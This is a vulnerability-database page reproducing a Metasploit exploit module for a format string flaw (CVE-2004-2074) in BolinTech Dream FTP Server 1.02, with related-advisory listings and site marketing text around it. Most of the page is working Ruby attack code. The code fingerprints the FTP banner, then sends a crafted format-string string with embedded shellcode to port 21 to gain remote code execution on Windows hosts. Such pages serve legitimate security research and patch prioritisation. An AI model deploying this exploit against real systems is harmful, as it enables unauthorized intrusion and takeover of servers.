Lucene search
K

BolinTech Dream FTP Server 1.02 Format String

🗓️ 09 Sep 2007 22:44:40Reported by aushack <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 29 Views

BolinTech Dream FTP Server 1.02 Format String exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2004-2074
22 Jun 201000:00
circl
CVE
CVE-2004-2074
19 May 200504:00
cve
Cvelist
CVE-2004-2074
19 May 200504:00
cvelist
Tenable Nessus
DreamFTP Server username Remote Format String
4 Mar 200400:00
nessus
Exploit DB
BolinTech DreamFTP Server 1.02 - Format String (Metasploit)
22 Jun 201000:00
exploitdb
NVD
CVE-2004-2074
31 Dec 200405:00
nvd
Packet Storm
BolinTech Dream FTP Server 1.02 Format String
27 Nov 200900:00
packetstorm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'BolinTech Dream FTP Server 1.02 Format String',
      'Description'	=> %q{
          This module exploits a format string overflow in the BolinTech
        Dream FTP Server version 1.02. Based on the exploit by SkyLined.
      },
      'Author' 		=> [ 'aushack' ],
      'Arch'		=> [ ARCH_X86 ],
      'License'        	=> MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-2074'],
          [ 'OSVDB', '4986'],
          [ 'BID', '9800'],
          [ 'EDB', '823']
        ],
      'Platform' 	=> ['win'],
      'Privileged'	=> false,
      'Payload'		=>
        {
          'Space'			=> 1000,
          'BadChars'		=> "\x00\x0a\x0d",
          'StackAdjustment'	=> -3500,
        },
      'Targets' 		=>
      [
        # Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
        [
          'Dream FTP Server v1.02 Universal',
          {
            'Offset'			=> 3957680, # 0x3c63ff-0x4f
          }
        ],
      ],
      'DisclosureDate' => '2004-03-03',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(21),
      ])
  end

  def check
    connect
    banner = sock.get_once
    disconnect
    if (banner.to_s =~ /Dream FTP Server/)
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect
    select(nil,nil,nil,0.25)
    sploit = "\xeb\x29"
    sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
    sploit << "@@@@@@@@" + payload.encoded
    sock.put(sploit + "\r\n")
    select(nil,nil,nil,0.25)
    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.5High risk
Vulners AI Score7.5
CVSS 25
EPSS0.3578
29